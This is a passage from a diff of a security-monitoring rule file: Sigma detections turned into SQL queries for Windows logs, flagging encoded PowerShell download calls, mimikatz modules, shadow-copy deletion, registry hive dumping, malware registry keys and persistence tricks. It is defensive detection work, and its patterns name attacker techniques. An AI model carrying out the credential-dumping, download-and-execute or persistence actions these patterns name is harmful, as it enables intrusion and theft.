OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "attack.resource_development", + "attack.t1588.002" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" - }, - { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' 
OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' 
ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "status": "experimental", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_add_persistence_com_key_linking.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Potential Ursnif Malware 
Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1112" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + 
"description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential NetWire RAT Activity - Registry", + "id": 
"1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate new entry added by windows" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE 
'\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Exports Registry Key To a File", - "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", - "status": "test", - "description": "Detects the export of the target Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, 
oscd.community", + "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate export of keys" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_regedit_export_keys.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Stop Windows Service Via PowerShell Stop-Service", - "id": "c49c5062-0966-4170-9efd-9968c913a6cf", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. 
